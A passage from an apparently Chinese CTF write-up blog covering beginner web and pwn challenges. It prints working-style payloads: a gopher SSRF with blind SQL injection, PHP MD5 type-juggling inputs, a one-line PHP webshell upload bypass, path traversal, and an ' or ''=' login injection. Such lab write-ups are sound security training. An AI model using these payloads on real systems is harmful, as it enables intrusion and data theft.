{"id":210,"date":"2025-01-14T13:26:50","date_gmt":"2025-01-14T05:26:50","guid":{"rendered":"https:\/\/www.okabe.xin\/?p=210"},"modified":"2025-01-14T13:26:50","modified_gmt":"2025-01-14T05:26:50","slug":"%e6%b7%b7%e6%9d%82","status":"publish","type":"post","link":"https:\/\/www.okabe.xin\/wordpress\/?p=210","title":{"rendered":"\u6df7\u6742"},"content":{"rendered":"\n

ATTACK\u7eed<\/strong><\/em><\/h1>\n\n\n\n

alert<\/strong><\/em><\/h1>\n\n\n\n

\u8fdb\u5165\u9898\u76ee\u73af\u5883\uff0c\u5f97\u5230\u7684\u662f\u4e00\u4e2a\u7a7a\u767d\u9875\u9762\uff0c\u53ea\u6709\u4e00\u4e2a\u63d0\u793a\u6846\u5728\u53cd\u590d\u51fa\u73b0<\/p>\n\n\n\n

    \n
  • \u6cd51<\/strong><\/em><\/li>\n<\/ul>\n\n\n\n

    \u7528view-source\u534f\u8bae\uff0c\u67e5\u770b\u6e90\u7801<\/p>\n\n\n\n

    \u7ffb\u9605\u53d1\u73b0\u5e95\u4e0b\u6709\u884c\u5c0f\u5b57<\/p>\n\n\n\n

    &#102;&#108;&#97;&#103;&#123;&#51;&#100;&#53;&#50;&#55;&#52;&#98;&#53;&#101;&#56;&#48;&#55;&#53;&#102;&#100;&#53;&#55;&#53;&#53;&#97;&#50;&#56;&#56;&#48;&#97;&#52;&#100;&#97;&#56;&#99;&#102;&#100;&#125<\/pre>\n\n\n\n
    \u76f4\u63a5\u968f\u6ce2\u9010\u6d41\u5c31\u597d\u4e86<\/p>\n\n\n\n
    \u5f97\u5230flag<\/p>\n\n\n\n
    flag{3d5274b5e8075fd5755a2880a4da8cfd}<\/pre>\n\n\n\n
      \n
    • \u6cd52<\/strong><\/em><\/li>\n<\/ul>\n\n\n\n
      \u76f4\u63a5burp\u6293\u5305\u5f97\u5230\u5c0f\u5b57\u5185\u5bb9<\/p>\n\n\n\n
      \u7136\u540e\u968f\u6ce2\u9010\u6d41<\/p>\n\n\n\n
      \u4f60\u5fc5\u987b\u8ba9\u4ed6\u505c\u4e0b<\/strong><\/em><\/h1>\n\n\n\n
      \u8fdb\u73af\u5883\uff0c\u5f97\u5230\u4e00\u4e2a\u4e0d\u65ad\u5237\u65b0\u7684\u9875\u9762\uff0c\u5237\u65b0\u901f\u5ea6\u8fc7\u5feb<\/p>\n\n\n\n
      \u65e0\u6cd5\u76f4\u63a5\u770b\u6e90\u7801\u62ffflag<\/p>\n\n\n\n
      \u9042\u9009\u62e9\u6293\u5305\u8fdb\u884c\u5904\u7406<\/p>\n\n\n\n
      \u770b\u5230\u6e90\u7801\uff0c\u4e00\u5f00\u59cb\u7b2c\u4e00\u6b21\u51faflag\u7684\u65f6\u5019\u4ee5\u4e3a\u548cmax-age\u7684\u503c\u76f8\u5173<\/p>\n\n\n\n
      \u4f46\u591a\u6b21\u590d\u73b0\u540e\u53d1\u73b0\u548c\u8fd9\u4e2a\u6ca1\u5173\u7cfb<\/p>\n\n\n\n
      \u4e0d\u9700\u8981\u4fee\u6539\u4efb\u4f55\u503c<\/p>\n\n\n\n
      \u591a\u53d1\u9001\u51e0\u904d\u8bf7\u6c42\u54cd\u5e94\u5c31\u4f1a\u770b\u5230flag<\/p>\n\n\n\n
      \u5934\u7b49\u8231<\/strong><\/em><\/h1>\n\n\n\n
      \u9898\u76ee\u53eb\u5934\u7b49\u8231\uff0c\u731c\u6d4b\u548c\u4ec0\u4e48\u5934\u6709\u5173<\/p>\n\n\n\n
      \u6bd4\u5982\u6807\u5934\u3001header\u5757\u4ec0\u4e48\u7684<\/p>\n\n\n\n
      \u8fdb\u5165\u73af\u5883<\/p>\n\n\n\n
      \u6253\u5f00F12<\/p>\n\n\n\n
      \u9010\u4e2a\u68c0\u67e5\u5f97flag<\/p>\n\n\n\n
      \u6d41\u91cf\u5206\u67901<\/strong><\/em><\/h1>\n\n\n\n
      \u5148\u968f\u4fbf\u627e\u6761\u6d41\u91cf\u8ffd\u8e2a\u4e00\u4e0b<\/p>\n\n\n\n
      \u770b\u5230\u4e00\u4e2a\u7c7b\u4f3curl\u7f16\u7801\u7684\u73a9\u610f\uff0c\u4e8e\u662f\u89e3\u7801\u4e00\u4e0b<\/p>\n\n\n\n
      GET \/index.php?url=gopher:\/\/127.0.0.1:80\/_POST%20%2Fadmin.php%20HTTP%2F1.1%250d%250aHost%3A%20localhost%3A80%250d%250aConnection%3A%20close%250d%250aContent-Type%3A%20application%2Fx-www-form-urlencoded%250d%250aContent-Length%3A%2078%250d%250a%250d%250aid%253D1%2529%2520and%2520if%2528%2528ascii%2528substr%2528%2528select%2520flag%2520from%2520flag%2529%252C1%252C1%2529%2529%253D%252740%2527%2529%252Csleep%25283%2529%252C0%2529%2520--%2520 HTTP\/1.1<\/em><\/pre>\n\n\n\n
      \u89e3\u7801\u540e<\/p>\n\n\n\n
      GET \/index.php?url=gopher:\/\/127.0.0.1:80\/_POST \/admin.php HTTP\/1.1%0d%0aHost: localhost:80%0d%0aConnection: close%0d%0aContent-Type: application\/x-www-form-urlencoded%0d%0aContent-Length: 78%0d%0a%0d%0aid%3D1%29%20and%20if%28%28ascii%28substr%28%28select%20flag%20from%20flag%29%2C1%2C1%29%29%3D%2740%27%29%2Csleep%283%29%2C0%29%20--%20 HTTP\/1.1<\/em><\/pre>\n\n\n\n
      \u53d1\u73b0\u8fd8\u6709url\u7f16\u7801<\/p>\n\n\n\n
      \u518d\u89e3\u7801\u5f97\u5230\u6700\u7ec8\u6548\u679c<\/p>\n\n\n\n
      GET \/index.php?url=gopher:\/\/127.0.0.1:80\/_POST \/admin.php HTTP\/1.1<\/em>
      Host: localhost:80<\/em>
      Connection: close<\/em>
      Content-Type: application\/x-www-form-urlencoded<\/em>
      Content-Length: 78<\/em>
      \u200b
      id=1) and if((ascii(substr((select flag from flag),1,1))='40'),sleep(3),0) --  HTTP\/1.1<\/pre>\n\n\n\n
      \u5927\u81f4\u610f\u601d\u662f\u5bf9flag\u8bfb\u53d6\u7b2c\u4e00\u4e2a\u5b57\u7b26\u8f6c\u6362\u4e3aascii\u7801\uff0c\u5982\u679c\u548c40\u76f8\u7b49\uff0c\u5c31\u5ef6\u65f6\u4e09\u79d2<\/p>\n\n\n\n
      \u5c31\u662f\u5bf9\u8fd9\u4e2a\u6570\u636e\u5e93\u4e2d\u7684flag\u8fdb\u884c\u731c\u89e3<\/p>\n\n\n\n
      \u90a3\u6211\u4eec\u8fc7\u6ee4\u6570\u636e\u5305\u7684\u6761\u4ef6\uff0c\u4e5f\u5c31\u662f\u731c\u89e3\u6210\u529f\u7684\u6761\u4ef6\u5c31\u662f\u5ef6\u65f6\u4e09\u79d2<\/p>\n\n\n\n
      \u4e8e\u662f\u952e\u5165\u6307\u4ee4<\/p>\n\n\n\n
      $$
      http.time >=3
      $$<\/p>\n\n\n\n
      \u5f97\u5230\u8fc7\u6ee4\u8fc7\u540e\u7684http\u6d41<\/p>\n\n\n\n
      \"\"<\/div><\/figure>\n\n\n\n
      \u6309\u7167\u987a\u5e8f\u6253\u5f00\u67e5\u770b\u5185\u5bb9<\/p>\n\n\n\n
      \u90fd\u53ea\u770bRequest URI\u5373\u53ef<\/p>\n\n\n\n
      \u53d1\u73b0\u4e5f\u662furl\u7f16\u7801<\/p>\n\n\n\n
      \u6309\u7167\u4e4b\u524d\u7684\u5de5\u5e8f\u641e\u5b8c\u5373\u53ef<\/p>\n\n\n\n
      \u4f8b\u5982\uff0c\u7b2c\u4e00\u4e2a\u6d41\u91cf\u91cc\u9762\u7684\u5185\u5bb9\u662f<\/p>\n\n\n\n
      \/index.php?url=gopher:\/\/127.0.0.1:80\/_POST%20%2Fadmin.php%20HTTP%2F1.1%250d%250aHost%3A%20localhost%3A80%250d%250aConnection%3A%20close%250d%250aContent-Type%3A%20application%2Fx-www-form-urlencoded%250d%250aContent-Length%3A%2079%250d%250a%250d%250aid%253D1%2529%2520and%2520if%2528%2528ascii%2528substr%2528%2528select%2520flag%2520from%2520flag%2529%252C1%252C1%2529%2529%253D%2527102%2527%2529%252Csleep%25283%2529%252C0%2529%2520--%2520<\/em><\/pre>\n\n\n\n
      \u5f7b\u5e95\u89e3\u7801\u540e\u662f<\/p>\n\n\n\n
      \/index.php?url=gopher:\/\/127.0.0.1:80\/_POST \/admin.php HTTP\/1.1<\/em>
      Host: localhost:80<\/em>
      Connection: close<\/em>
      Content-Type: application\/x-www-form-urlencoded<\/em>
      Content-Length: 79<\/em>
      \u200b
      id=1) and if((ascii(substr((select flag from flag),1,1))='102'),sleep(3),0) -- <\/pre>\n\n\n\n
      \u4ee5\u6b64\u7c7b\u63a8<\/p>\n\n\n\n
      \u7b2c\u4e00\u4e2a\u663e\u793a102<\/p>\n\n\n\n
      ascii\u7801\u7684102\u5c31\u662ff<\/p>\n\n\n\n
      \u90a3\u4e48\u53ef\u4ee5\u9884\u89c1\u7684\u662fflag{xxxxxxxxx}<\/p>\n\n\n\n
      \u6328\u7740\u89e3\u7801\u5373\u53ef<\/p>\n\n\n\n
      \u77db\u76fe<\/strong><\/em><\/h1>\n\n\n\n
      \u5f88\u5e38\u89c4\u7684\u4e00\u4e2a\u4f20\u53c2\u95ee\u9898<\/p>\n\n\n\n
      \u8fdb\u73af\u5883<\/p>\n\n\n\n
      \u770b\u5230\u6e90\u7801<\/p>\n\n\n\n
      $num=$_GET['num'];<\/em>
      if(!is_numeric($num))<\/em>
      {<\/em>
      echo $num;<\/em>
      if($num==1)<\/em>
      echo 'flag{<\/em>**********}';<\/em><\/strong>
      }<\/em><\/strong><\/pre>\n\n\n\n
      \u4e00\u76ee\u4e86\u7136<\/p>\n\n\n\n
      \u8981\u901a\u8fc7get\u4f20\u53c2\uff0c\u6539url\u5373\u53ef<\/p>\n\n\n\n
      \u8981\u5f97\u5230flag\u5fc5\u987b\u4f20\u5165\u7684num\u7684\u503c\u7b49\u4e8e1<\/p>\n\n\n\n
      \u800cnum\u53c8\u4e0d\u80fd\u662f\u6570\u5b57\uff0c\u4e0d\u7136\u5c31\u4e4b\u540e\u663e\u793anum\u7684\u5185\u5bb9<\/p>\n\n\n\n
      \u6240\u4ee5\u6784\u9020num<\/p>\n\n\n\n
      \/?num=1ada<\/pre>\n\n\n\n
      \u5f97\u5230flag<\/p>\n\n\n\n
      \u5907\u4efd\u662f\u4e2a\u597d\u4e60\u60ef<\/strong><\/em><\/h1>\n\n\n\n
      \u8fdb\u5165\u73af\u5883<\/p>\n\n\n\n
      \u4ec0\u4e48\u90fd\u6ca1\u6709<\/p>\n\n\n\n
      \u8bf4\u5907\u4efd<\/p>\n\n\n\n
      \u8003\u8651\u5e38\u89c1\u5907\u4efd\u6587\u4ef6\u540e\u7f00<\/p>\n\n\n\n
      \u5907\u4efd\u6587\u4ef6\u5e38\u89c1\u7684\u540e\u7f00\u540d \u5907\u4efd\u6587\u4ef6\u57fa\u672c\u4e0a\u90fd\u662f\u538b\u7f29\u5305<\/p>\n\n\n\n
        \n
      • .rar<\/li>\n\n\n\n
      • .zip<\/li>\n\n\n\n
      • .7z<\/li>\n\n\n\n
      • .tar.gz<\/li>\n\n\n\n
      • .bak<\/li>\n<\/ul>\n\n\n\n
        \u5bf9\u4e8ebak\u7c7b\u7684\u5907\u4efd\u6587\u4ef6\uff0c\u53ef\u4ee5\u76f4\u63a5\u8f93\u5165\u6587\u4ef6\u540d\u79f0+.bak\u8bbf\u95ee\u4f8b\u5982\uff1a<\/p>\n\n\n\n
          \n
        • index.php.bak<\/li>\n\n\n\n
        • .txt<\/li>\n\n\n\n
        • .old<\/li>\n\n\n\n
        • .temp<\/li>\n\n\n\n
        • _index.html<\/li>\n\n\n\n
        • .swp<\/li>\n\n\n\n
        • .sql<\/li>\n\n\n\n
        • .tgz<\/li>\n\n\n\n
        • tar<\/li>\n<\/ul>\n\n\n\n
          \u5907\u4efd\u6587\u4ef6\u5e38\u89c1\u7684\u6587\u4ef6\u540d \u6587\u4ef6\u540d\u4e0d\u5305\u542b\u540e\u7f00<\/p>\n\n\n\n
            \n
          • web<\/li>\n\n\n\n
          • website<\/li>\n\n\n\n
          • backup<\/li>\n\n\n\n
          • back<\/li>\n\n\n\n
          • www<\/li>\n\n\n\n
          • wwwroot<\/li>\n\n\n\n
          • temp<\/li>\n\n\n\n
          • db<\/li>\n\n\n\n
          • data<\/li>\n\n\n\n
          • code<\/li>\n\n\n\n
          • test<\/li>\n\n\n\n
          • admin<\/li>\n\n\n\n
          • user<\/li>\n\n\n\n
          • sql<\/li>\n<\/ul>\n\n\n\n
            \u8bf4\u56de\u6b64\u9898<\/p>\n\n\n\n
            \u8bd5\u51fa\u5b58\u5728\u5907\u4efd\u6587\u4ef6index.php.bak<\/p>\n\n\n\n
            \uff08\u6ce8\uff1a\u53ef\u4ee5\u76f4\u63a5\u9760\u5fa1\u5251\u626b\u76ee\u5f55\u5f97\u77e5\u5b58\u5728<\/p>\n\n\n\n
            \"\"<\/div><\/figure>\n\n\n\n
            \u770b\u5230index.php.bak\u4e2d\u7684\u5185\u5bb9<\/p>\n\n\n\n
            <?php
            \/**
            \u200b
             * Created by PhpStorm.
             * User: Norse
             * Date: 2017\/8\/6
             * Time: 20:22
               *\/
            \u200b
            include_once \"flag.php\";
            ini_set(\"display_errors\", 0);
            $str = strstr($_SERVER['REQUEST_URI'], '?');
            $str = substr($str,1);
            $str = str_replace('key','',$str);
            parse_str($str);
            echo md5($key1);
            \u200b
            echo md5($key2);
            if(md5($key1) == md5($key2) && $key1 !== $key2){
                echo $flag.\"\u53d6\u5f97flag\";
            }
            ?><\/pre>\n\n\n\n
            \u7531\u4e8e<\/p>\n\n\n\n
            $str = str_replace('key','',$str);<\/pre>\n\n\n\n
            \u5bfc\u81f4\u4e86key\u7684\u503c\u4f1a\u88ab\u91cd\u65b0\u8d4b\u503c\u4e3a\u7a7a<\/p>\n\n\n\n
            \u6240\u4ee5\u6211\u4eec\u5f97\u7ed5\u8fc7\u8fd9\u4e2akey\u68c0\u6d4b<\/p>\n\n\n\n
            \u6240\u4ee5\u8fd9\u91cc\u91c7\u7528\u53cc\u5199\u7ed5\u8fc7<\/strong><\/em>\u7684\u65b9\u6cd5\u8fdb\u884c\u89e3\u51b3<\/p>\n\n\n\n
            \u5373\u5199\u4e3akekeyy1 kekeyy2<\/p>\n\n\n\n
            \u540e\u7eed\u65b9\u6cd5\u6709\u4e24\u79cd\u6765\u4f7f\u5f97key1\u548ckey2\u7684md5\u503c\u76f8\u7b49<\/p>\n\n\n\n
            \u2460\u6570\u7ec4\u7ed5\u8fc7<\/h3>\n\n\n\n
            \u6784\u9020payload\u4e3a<\/p>\n\n\n\n
            \/?kekeyy1[]=aa&kekeyy2[]=dad<\/pre>\n\n\n\n
            \u540e\u7eed\u503c\u4e0d\u4e00\u6837\u5373\u53ef<\/p>\n\n\n\n
            \u539f\u7406\u5c31\u662fmd5\u51fd\u6570\u65e0\u6cd5\u5904\u7406\u6570\u7ec4\uff0c\u8fd9\u6837\u5c31\u4f1a\u8fd4\u56de\u4e24\u4e2aNULL\uff0c\u800c\u4e24\u4e2aNULL\u7684md5\u503c\u662f\u4e00\u6837\u7684\uff0c\u4f46\u662f\u4f20\u5165\u7684key\u503c\u53ef\u4ee5\u4e0d\u540c<\/p>\n\n\n\n
            \u6240\u4ee5\u8fd9\u6837\u5c31\u80fd\u591f\u83b7\u53d6\u5230flag<\/p>\n\n\n\n
            \u24610e\u5f00\u5934\u7684md5\u503c<\/h3>\n\n\n\n
            \u7c7b\u4f3c\u7684\u6784\u9020payload<\/p>\n\n\n\n
            \u4f46\u662f\u4e0d\u9700\u8981\u6570\u7ec4<\/p>\n\n\n\n
            \u6784\u9020payload\u4e3a<\/p>\n\n\n\n
            \/?kekeyy1=240610708&kekeyy2=QNKCDZO<\/pre>\n\n\n\n
            \u4e5f\u80fd\u76f4\u63a5\u62ff\u5230flag<\/p>\n\n\n\n
            \u539f\u7406\u662f\u4f7f\u7528==\u8fd9\u4e2a\u7684\u6bd4\u8f83\u6f0f\u6d1e\uff0c\u5982\u679c\u4e24\u4e2a\u5b57\u7b26\u7ecf\u8fc7md5\u52a0\u5bc6\u540e\u7684\u503c\u662f0exxxxx\u5f62\u5f0f\uff0c\u5728\u79d1\u5b66\u8ba1\u6570\u6cd5\u4e2d\u4f1a\u88ab\u8ba4\u4e3a\u662f0*10\u7684\u51e0\u6b21\u65b9\u7684\uff0c\u7ed3\u679c\u662f0\u3002\u6b64\u65f6\uff0cmd5\u52a0\u5bc6\u503c\u76f8\u7b49\uff0c\u4f46\u662fkey\u503c\u662f\u4e0d\u7b49\u7684<\/p>\n\n\n\n
            if(md5($key1) == md5($key2) && $key1 !== $key2)<\/pre>\n\n\n\n
            (==\u6bd4\u8f83\u6f0f\u6d1e\u7684\u5177\u4f53\u4f4d\u7f6e)<\/p>\n\n\n\n
            \u90a3\u4e48\u76f4\u63a5\u4f20\u5165md5\u503c\u4e3a0e\u5f00\u5934\u7684\u4efb\u610f\u4e24\u4e2a\u5b57\u7b26\u4e32\u5373\u53ef<\/p>\n\n\n\n
            \u7c7b\u4f3c\u7684\u503c\u8fd8\u6709<\/p>\n\n\n\n
            240610708
            0e462097431906509019562988736854
            QNKCDZO
            0e830400451993494058024219903391
            s878926199a
            0e545993274517709034328855841020
            s155964671a
            0e342768416822451524974117254469 
            s214587387a
            0e848240448830537924465865611904
            s214587387a
            0e848240448830537924465865611904 
            s878926199a
            0e545993274517709034328855841020 
            s1091221200a
            0e940624217856561557816327384675 
            s1885207154a
            0e509367213418206700842008763514
            s1502113478a
            0e861580163291561247404381396064
            s1885207154a
            0e509367213418206700842008763514
            s1836677006a
            0e481036490867661113260034900752  
            s155964671a
            0e342768416822451524974117254469  
            s1184209335a
            0e072485820392773389523109082030  
            s1665632922a
            0e731198061491163073197128363787
            s1502113478a
            0e861580163291561247404381396064
            s1836677006a
            0e481036490867661113260034900752  
            s1091221200a
            0e940624217856561557816327384675 
            s155964671a
            0e342768416822451524974117254469
            s1502113478a
            0e861580163291561247404381396064
            s155964671a
            0e342768416822451524974117254469
            s1665632922a
            0e731198061491163073197128363787 
            s155964671a
            0e342768416822451524974117254469 
            s1091221200a
            0e940624217856561557816327384675 
            s1836677006a
            0e481036490867661113260034900752  
            s1885207154a
            0e509367213418206700842008763514  
            s532378020a
            0e220463095855511507588041205815
            s878926199a
            0e545993274517709034328855841020
            s1091221200a
            0e940624217856561557816327384675
            s214587387a
            0e848240448830537924465865611904
            s1502113478a
            0e861580163291561247404381396064
            s1836677006a
            0e481036490867661113260034900752 
            s1665632922a
            0e731198061491163073197128363787
            s878926199a
            0e545993274517709034328855841020
            s878926199a
            0e545993274517709034328855841020
            s155964671a
            0e342768416822451524974117254469
            s214587387a
            0e848240448830537924465865611904
            s214587387a
            0e848240448830537924465865611904
            s878926199a
            0e545993274517709034328855841020
            s1091221200a
            0e940624217856561557816327384675
            s1885207154a
            0e509367213418206700842008763514
            s1502113478a
            0e861580163291561247404381396064
            s1885207154a
            0e509367213418206700842008763514
            s1836677006a
            0e481036490867661113260034900752
            s155964671a
            0e342768416822451524974117254469
            s1184209335a
            0e072485820392773389523109082030
            s1665632922a
            0e731198061491163073197128363787
            s1502113478a
            0e861580163291561247404381396064
            s1836677006a
            0e481036490867661113260034900752
            s1091221200a
            0e940624217856561557816327384675
            s155964671a
            0e342768416822451524974117254469
            s1502113478a
            0e861580163291561247404381396064
            s155964671a
            0e342768416822451524974117254469
            s1665632922a
            0e731198061491163073197128363787
            s155964671a
            0e342768416822451524974117254469
            s1091221200a
            0e940624217856561557816327384675
            s1836677006a
            0e481036490867661113260034900752
            s1885207154a
            0e509367213418206700842008763514
            s532378020a
            0e220463095855511507588041205815
            s878926199a
            0e545993274517709034328855841020
            s1091221200a
            0e940624217856561557816327384675
            s214587387a
            0e848240448830537924465865611904
            s1502113478a
            0e861580163291561247404381396064
            s1091221200a
            0e940624217856561557816327384675
            s1665632922a
            0e731198061491163073197128363787
            s1885207154a
            0e509367213418206700842008763514
            s1836677006a
            0e481036490867661113260034900752
            s1665632922a
            0e731198061491163073197128363787
            s878926199a
            0e545993274517709034328855841020<\/pre>\n\n\n\n
            \u603b\u4e4b\u7528\u6570\u7ec4\u6216==\u6bd4\u8f83\u6f0f\u6d1e\u90fd\u53ef<\/p>\n\n\n\n
            \u7136\u540e\u62ff\u5230flag<\/p>\n\n\n\n
            \u53d8\u91cf1<\/h1>\n\n\n\n
            \u8fdb\u5165\u73af\u5883<\/p>\n\n\n\n
            \u770b\u5230\u6e90\u7801<\/p>\n\n\n\n
            flag In the variable !` <?php error_reporting(0);include \"flag1.php\";highlight_fileflag In the variable ! <?php  
            \u200b
            error_reporting(0);
            include \"flag1.php\";
            highlight_file(__file__);
            if(isset($_GET['args'])){
                $args = $_GET['args'];
                if(!preg_match(\"\/^\\w+$\/\",$args)){
                    die(\"args error!\");
                }
                eval(\"var_dump($$args);\");
            }
            ?>(__file__);if(isset($_GET['args'])){  $args = $_GET['args'];  if(!preg_match(\"\/^\\w+$\/\",$args)){    die(\"args error!\");  }  eval(\"var_dump($$args);\");}?>`<\/pre>\n\n\n\n
            \u8fd9\u91cc\u7684\u6b63\u5219\u8868\u8fbe\u5f0f\u9650\u5236\u4e86args\u7684\u503c<\/p>\n\n\n\n
            \u4e0d\u77e5\u9053\u4e3a\u4ec0\u4e48\u53ef\u4ee5\u4f9d\u9760\u8d85\u7ea7\u73af\u5883\u53d8\u91cf\u8fdb\u884c\u8d4b\u503c\u89e3\u51b3\u5f97\u5230flag<\/p>\n\n\n\n
            \u952e\u5165<\/p>\n\n\n\n
            \/?args=GLOBALS<\/pre>\n\n\n\n
            \u62ff\u5230flag<\/p>\n\n\n\n
            upload1<\/strong><\/em><\/h1>\n\n\n\n
            \u8fdb\u5165\u73af\u5883<\/p>\n\n\n\n
            \u662f\u4e0a\u4f20<\/p>\n\n\n\n
            \u8981\u6c42\u5fc5\u987b\u662f\u56fe\u7247<\/p>\n\n\n\n
            \u6784\u9020\u4e00\u53e5\u8bdd\u6728\u9a6c<\/p>\n\n\n\n
            \u65b0\u5efa\u4e00\u4e2atxt\u6587\u6863<\/p>\n\n\n\n
            \u952e\u5165<\/p>\n\n\n\n
            <?php
            @eval['123'];
            echo('123')
            ?><\/pre>\n\n\n\n
            \u4fee\u6539\u540e\u7f00\u4e3aJPG<\/p>\n\n\n\n
            \u4e0a\u4f20<\/p>\n\n\n\n
            \u6293\u5305\u62e6\u622a<\/p>\n\n\n\n
            \u4fee\u6539\u6293\u5230\u7684\u5305\u7684\u540e\u7f00\u4e3aphp<\/p>\n\n\n\n
            \u968f\u540e\u53ef\u4ee5\u8fdb\u5165 url\/upload\/\u4e00\u53e5\u8bdd\u6728\u9a6c\u6587\u4ef6\u540d.php\u9875\u9762\u67e5\u770b\u662f\u5426\u4e0a\u4f20\u6210\u529f<\/p>\n\n\n\n
            \u5982\u679c\u6210\u529f\uff0c\u4f1a\u5f97\u5230<\/p>\n\n\n\n
            \"\"<\/div><\/figure>\n\n\n\n
            \u5b9e\u9645\u5728\u9875\u9762\u4e0a\u7684\u663e\u793a\u5185\u5bb9\u5c31\u662f\u4e00\u4e2a\u53ea\u6709\u6570\u5b57123\u7684\u4e00\u4e2a\u7a7a\u767d\u9875<\/p>\n\n\n\n
            \u7136\u540e\u4e2d\u56fd\u8681\u5251<\/p>\n\n\n\n
            \u65b0\u5efa\u6570\u636e<\/p>\n\n\n\n
            url\u586bupload\u540e\u7684\u9875\u9762<\/p>\n\n\n\n
            \u5bc6\u7801\u586b123<\/p>\n\n\n\n
            \u65b0\u5efa\u6210\u529f\u540e<\/p>\n\n\n\n
            \u53cc\u51fb\u6570\u636e<\/p>\n\n\n\n
            \u53ef\u4ee5\u8fdb\u5165\u8fd9\u4e2a\u754c\u9762<\/p>\n\n\n\n
            \"\"<\/div><\/figure>\n\n\n\n
            flag\u5927\u6982\u7387\u5728\u6839\u76ee\u5f55<\/p>\n\n\n\n
            \u76f4\u63a5\u53bb\u6839\u76ee\u5f55\u627eflag\u6587\u4ef6\u5373\u53ef<\/p>\n\n\n\n
            \u6700\u540e\u5728\u6839\u76ee\u5f55\u627e\u5230<\/p>\n\n\n\n
            \"\"<\/div><\/figure>\n\n\n\n
            \u70b9\u8fdbflag.php\u5373\u53ef<\/p>\n\n\n\n
            \u62ff\u5230flag<\/p>\n\n\n\n
            get_shell<\/strong><\/em><\/h1>\n\n\n\n
            \u4e0b\u8f7d\u9644\u4ef6<\/p>\n\n\n\n
            \u7528checksec\u68c0\u67e5\u4e00\u4e0b\u9644\u4ef6<\/p>\n\n\n\n
            \"\"<\/div><\/figure>\n\n\n\n
            \u5199exp<\/p>\n\n\n\n
            \"\"<\/div><\/figure>\n\n\n\n
            \u8fd0\u884c\uff0c\u62ff\u5230shell<\/p>\n\n\n\n
            \u8f93\u5165ls<\/p>\n\n\n\n
            \u8fdb\u884c\u4ea4\u4e92<\/p>\n\n\n\n
            \u770b\u5230\u4ee5\u4e0b\u56de\u663e<\/p>\n\n\n\n
            \"\"<\/div><\/figure>\n\n\n\n
            cat flag\u5373\u53ef<\/p>\n\n\n\n
            warmup<\/strong><\/em><\/h1>\n\n\n\n
            \u8fdb\u5165\u73af\u5883<\/p>\n\n\n\n
            \u6ca1\u627e\u5230\u4ec0\u4e48\u6709\u7528\u4fe1\u606f<\/p>\n\n\n\n
            F12<\/p>\n\n\n\n
            \u6ce8\u91ca\u63d0\u793asource.php<\/p>\n\n\n\n
            \u8fdb\u5165\u8fd9\u4e2a\u9875\u9762<\/p>\n\n\n\n
            \u770b\u5230\u6e90\u7801<\/p>\n\n\n\n
            \u63d0\u793ahint.php<\/p>\n\n\n\n
            \u5728\u8fd9\u4e2a\u9875\u9762\u7684\u57fa\u7840\u4e0a\u770bhint.php<\/p>\n\n\n\n
            \u5373<\/p>\n\n\n\n
            url\/source.php?file=hint.php<\/pre>\n\n\n\n
            \u56e0\u4e3a\u6211\u4eec\u5f53\u524d\u7684source.php\u4e00\u822c\u662f\u5728html\u76ee\u5f55\u4e0b\uff0c\u5f80\u4e0a\u662fwww\uff0cvar\uff0c\u7136\u540e\u5230\u6839\u76ee\u5f55\uff0cflag\u4e00\u822c\u5c31\u653e\u5728\u6839\u76ee\u5f55\u4e0b\u9762\uff0c\u8fd9\u91cc\u8fd8\u6709\u4e00\u4e2ahint.php?\/\u6216\u8005source.php?\/\uff0c\u56e0\u6b64\u9700\u8981\u8fd4\u56de\u56db\u5c42\u624d\u80fd\u5230\u6839\u76ee\u5f55<\/p>\n\n\n\n
            \u6240\u4ee5\u6784\u9020payload<\/p>\n\n\n\n
            source.php?file=hint.php?\/..\/..\/..\/..\/ffffllllaaaagggg<\/pre>\n\n\n\n
            inget<\/strong><\/em><\/h1>\n\n\n\n
            \u8fdb\u5165\u73af\u5883<\/p>\n\n\n\n
            \u63d0\u793a\u8f93\u5165ID\u548cbypass<\/p>\n\n\n\n
            bypass\u662f\u7ed5\u8fc7<\/p>\n\n\n\n
            id\u4f1a\u60f3\u5230\u4ec0\u4e48<\/p>\n\n\n\n
            sql\u6ce8\u5165\u5427<\/p>\n\n\n\n
            \u4e0d\u4f1a\uff0c\u624b\u5de5\u6ce8\u4e00\u4e0b<\/p>\n\n\n\n
            \u6ca1\u770b\u5230\u4ec0\u4e48\u4e1c\u897f<\/p>\n\n\n\n
            \u4e0a\u7f51\u67e5<\/p>\n\n\n\n
            \u5f97\u77e5\u4e07\u80fd\u5bc6\u7801\u6ce8<\/p>\n\n\n\n
            \/?id=' or ''='<\/pre>\n\n\n\n
            url\u7f16\u7801\u540e\u5c31\u662f<\/p>\n\n\n\n
            \/?id=%27%20or%20%27%27=%27<\/pre>\n\n\n\n
            \u539f\u7406\u662f<\/p>\n\n\n\n
            \u6211\u4eec\u8fd9\u91cc\u662f\u4ee5get\u4f20\u53c2\u7684\u65b9\u5f0f\u5728\u524d\u7aef\u7ed9id\u4f20\u4e86\u4e2a\u503c\uff0c\u540e\u7aef\u4f1a\u5bf9\u6211\u4eec\u63d0\u4ea4\u7684\u5185\u5bb9\u8fdb\u884c\u67e5\u8be2<\/p>\n\n\n\n
            \u6bd4\u5982\u6211\u4eec\u63d0\u4ea4\u7684\u662f id=123<\/p>\n\n\n\n
            \u800c\u5230\u540e\u7aef\u5927\u6982\u4f1a\u5448\u73b0\u51fa\u6765\u7684\u90e8\u5206\u5185\u5bb9\u5c31\u662f ‘id=123’<\/p>\n\n\n\n
            \u4f1a\u6709\u5355\u5f15\u53f7\u5c06\u8fd9\u4e2a\u5185\u5bb9\u5f15\u8d77\u6765\u8fdb\u884c\u67e5\u8be2<\/p>\n\n\n\n
            \u8fd9\u6837\u6211\u4eec\u5c31\u597d\u7406\u89e3\u4e0a\u9762payload\u7684\u539f\u7406\u4e86<\/p>\n\n\n\n
            \u6211\u4eec\u4f20\u5165 id=’ or ”=’ \u5b9e\u9645\u4e0a\u5230\u4e86\u540e\u7aef\u5927\u6982\u662f\u8fd9\u6837\u5b50 ‘id=’ or ”=”<\/p>\n\n\n\n
            \u5bf9\u4e8e\u6211\u4eec\u4f20\u5165\u7684\u56db\u4e2a\u5355\u5f15\u53f7\u7684\u89e3\u91ca\uff1a<\/p>\n\n\n\n
            \u7b2c\u4e00\u4e2a\u5355\u5f15\u53f7\uff0c\u4e0e\u67e5\u8be2\u65f6\u524d\u9762\u7684\u5355\u5f15\u53f7\u5f62\u6210\u95ed\u5408\uff1b<\/p>\n\n\n\n
